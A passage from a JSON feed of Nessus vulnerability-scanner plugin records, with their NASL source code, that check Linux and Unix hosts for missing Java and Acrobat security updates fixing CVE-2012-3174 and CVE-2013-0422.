value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-cmaps-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, 
value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2022 Canonical, Inc. / NASL script (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-cacao\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-jamvm\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-headless\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-lib\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-zero\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-7-jre-cacao / icedtea-7-jre-jamvm / openjdk-7-jre / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:32", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that potentially allow arbitrary code execution (including remotely via applets).\n\nIt is strongly recommended that all Java users in Fedora immediately update to this release.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "Fedora 18 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18 (2013-0853)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-0853.NASL", "href": "https://www.tenable.com/plugins/nessus/63584", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0853.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63584);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0853\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Fedora 18 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18 (2013-0853)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?624fa2f6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.7.0-openjdk package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:33", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that potentially allow arbitrary code execution (including remotely via applets).\n\nIt is strongly recommended that all Java users in Fedora immediately update to this release.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "Fedora 16 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-0888.NASL", "href": "https://www.tenable.com/plugins/nessus/63586", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0888.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63586);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0888\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Fedora 16 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096995.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df90b29d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.7.0-openjdk package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:34:11", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is earlier than 7 Update 11 and is, therefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries component. 
(CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass' method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client deployments of Java only and can only be exploited through untrusted 'Java Web Start' applications and untrusted Java applets.", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "nessus", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "href": "https://www.tenable.com/plugins/nessus/64840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64840);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a programming platform that is potentially\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. 
(CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2013/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo = \"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n 
info;\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:04", "description": "Updated java-1.7.0-openjdk packages that fix two security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection API in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. 
All running instances of OpenJDK Java must be restarted for the update to take effect.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.3", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo"], "id": "REDHAT-RHSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/63590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0165. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63590);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. 
All running instances of\nOpenJDK Java must be restarted for the update to take effect.\");\n # http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.4/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?646d4ea1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2013:0165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-3174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2013-0422\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk\");\n 
